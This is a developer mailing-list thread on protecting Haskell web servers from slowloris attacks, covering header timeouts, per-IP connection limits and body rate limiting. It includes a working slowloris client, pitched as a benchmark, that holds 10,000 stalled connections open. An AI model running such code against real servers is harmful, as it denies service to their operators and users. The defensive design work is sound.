
I don't know if Snap is doing this yet, but it is possible to just deny
partial GET/HEAD requests.
Apache is considered vulnerable to slowloris because it has a limited thread
pool. Nginx is not, because it uses an evented architecture and by default
drops connections that have not completed within 60 seconds. Our Haskell web
servers nominally use threads, but those threads are managed by a very fast
evented runtime (GHC's I/O manager). So we can hold many idle connections
open, like Nginx, and should not be vulnerable as long as we have a timeout
that cannot be tickled. This could make for an interesting benchmark - how
many slowloris connections can we take on? The code from Kazu makes just one
connection - it does not demonstrate a successful slowloris attack, just one
successful slowloris connection.
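A rough sketch of such a benchmark client, in Haskell using the network
package (the target host/port, connection count, and 10-second trickle
interval are all made-up parameters):

    import Control.Concurrent (forkIO, threadDelay)
    import Control.Monad (forM_, forever)
    import qualified Data.ByteString.Char8 as B
    import Network.Socket
    import Network.Socket.ByteString (sendAll)

    -- Open one slowloris connection: send an incomplete request,
    -- then trickle one header byte per interval, never finishing.
    slowConn :: HostName -> ServiceName -> IO ()
    slowConn host port = do
        addr:_ <- getAddrInfo (Just defaultHints { addrSocketType = Stream })
                              (Just host) (Just port)
        sock <- socket (addrFamily addr) (addrSocketType addr) (addrProtocol addr)
        connect sock (addrAddress addr)
        sendAll sock (B.pack "GET / HTTP/1.1\r\nX-Slow: ")
        forever $ do
            threadDelay (10 * 1000 * 1000)   -- 10 seconds between bytes
            sendAll sock (B.pack "a")

    main :: IO ()
    main = do
        -- one lightweight GHC thread per connection; the runtime
        -- multiplexes them over the evented I/O manager
        forM_ [1 .. 10000 :: Int] $ \_ -> forkIO (slowConn "127.0.0.1" "8000")
        threadDelay maxBound                 -- keep the connections open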
If we limit the number of connections per IP address, a slowloris attack
would require coordinating thousands of nodes, making it highly impractical.
There may be an issue with proxies, though: they funnel many users through a
few addresses and so legitimately want to make lots of connections (AOL at
least used to do this, but I think just for GET).
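A minimal sketch of a per-IP connection counter (the names are hypothetical,
the table keys on IPv4 addresses only, and a real version would also handle
IPv6):

    import Control.Concurrent.MVar
    import qualified Data.Map.Strict as M
    import Network.Socket (SockAddr (..), HostAddress)

    type ConnTable = MVar (M.Map HostAddress Int)

    -- Try to register a new connection for this peer; False means the
    -- per-IP cap has been hit and the connection should be refused.
    acquire :: Int -> ConnTable -> SockAddr -> IO Bool
    acquire cap table (SockAddrInet _ host) =
        modifyMVar table $ \m ->
            let n = M.findWithDefault 0 host m
            in  if n >= cap
                    then return (m, False)
                    else return (M.insert host (n + 1) m, True)
    acquire _ _ _ = return True          -- don't limit non-IPv4 peers here

    release :: ConnTable -> SockAddr -> IO ()
    release table (SockAddrInet _ host) =
        modifyMVar_ table $ return .
            M.update (\n -> if n <= 1 then Nothing else Just (n - 1)) host
    release _ _ = return ()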
---------- Forwarded message ----------
From: Gregory Collins
I think Greg's/Snap's approach of a separate timeout for the status line and headers is right on the money. It should never take more than one timeout cycle to receive a full set of headers, no matter how slow the user's connection is, given a reasonable timeout setting from the user (anything over 2 seconds should be fine, I'd guess; our default is 30 seconds).
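The key point is that one timeout wraps the whole header read, so trickling
bytes cannot reset it. A sketch of that shape (recvChunk stands in for
whatever read action the server actually uses; all names here are made up):

    import qualified Data.ByteString.Char8 as B
    import System.Timeout (timeout)

    -- Accumulate socket chunks until the blank line that ends the headers.
    recvAllHeaders :: IO B.ByteString -> IO B.ByteString
    recvAllHeaders recvChunk = go B.empty
      where
        go acc
            | B.pack "\r\n\r\n" `B.isInfixOf` acc = return acc
            | otherwise = do
                chunk <- recvChunk
                if B.null chunk then return acc   -- peer closed early
                                else go (acc `B.append` chunk)

    -- The complete header block must arrive within `secs` seconds;
    -- nothing the client does can extend that window.
    readHeaders :: Int -> IO B.ByteString -> IO (Maybe B.ByteString)
    readHeaders secs recvChunk =
        timeout (secs * 1000 * 1000) (recvAllHeaders recvChunk)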
That's fairly uncontroversial.
The bigger question is what we do about the request body. A simple approach: if a packet from the client is smaller than a certain size (user-defined; maybe 2048 bytes is a good default), it does not tickle the timeout at all. Obviously this means a malicious client could be devised to send precisely 2048 bytes per timeout cycle... but I don't think there's any way to do better than this.
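That policy is small enough to sketch directly (tickle stands in for
whatever resets this connection's timeout; the names are hypothetical):

    import qualified Data.ByteString as B

    -- A packet below the threshold is still consumed, but buys the
    -- client no extra time; only substantial packets reset the clock.
    onBodyPacket :: Int -> IO () -> B.ByteString -> IO ()
    onBodyPacket threshold tickle pkt
        | B.length pkt >= threshold = tickle
        | otherwise                 = return ()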
This doesn't really work either. I've already posted code in this thread for what I think is the only reasonable option, which is rate limiting. The way we've implemented it:
1) any individual data packet must arrive within N seconds (the usual timeout);
2) when a packet arrives, compute the transfer rate in bytes per second; if it is lower than X bytes/sec (where X is a policy decision left up to the user), the connection is killed;
3) the check from 2) only kicks in after Y seconds, to cover cases where the client needs to do some expensive initial setup. Y is also a policy decision.
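A minimal sketch of checks 2) and 3) above (check 1) is just the usual
per-packet timeout; the function and parameter names here are assumptions,
not Snap's actual code):

    import Data.Time.Clock (UTCTime, diffUTCTime, getCurrentTime)

    -- Decide whether to keep a connection alive. `minRate` is X
    -- (bytes/sec), `grace` is Y (seconds), `started` is when the
    -- transfer began, `total` is bytes received so far.
    keepAlive :: Double -> Double -> UTCTime -> Int -> IO Bool
    keepAlive minRate grace started total = do
        now <- getCurrentTime
        let elapsed = realToFrac (diffUTCTime now started) :: Double
        return $ elapsed <= grace                         -- setup window
              || fromIntegral total / elapsed >= minRate  -- fast enough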
We *have* to err on the side of allowing attacks, otherwise we'll end up disconnecting valid requests.
I don't agree with this. Some kinds of "valid" requests are indistinguishable from attacks. You need to decide what's more important: letting some guy on a 30-kilobit packet radio connection upload a big file, or letting someone DoS your server.
In other words, here's how I'd see the timeout code working:
1. A timeout is created at the beginning of a connection and is not tickled at all until all the request headers have been read.
2. Every time X (default: 2048) bytes of the request body are read, the timeout is tickled.
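Step 2 needs a small amount of state to count bytes across packets. A
sketch of what that could look like (tickle again stands in for the
timeout-reset action; the names are made up):

    import Data.IORef

    -- Returns an action to call with each packet's size; it fires
    -- `tickle` once for every full X bytes of body received, carrying
    -- any remainder over to the next packet.
    mkBodyTickler :: Int -> IO () -> IO (Int -> IO ())
    mkBodyTickler x tickle = do
        ref <- newIORef 0
        return $ \n -> do
            fire <- atomicModifyIORef' ref $ \acc ->
                let acc' = acc + n
                in  if acc' >= x then (acc' `mod` x, True)
                                 else (acc', False)
            if fire then tickle else return ()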
Note that this is basically a crude form of rate-limiting (at X/T
bytes per second). Why not do it "properly"?
G
--
Gregory Collins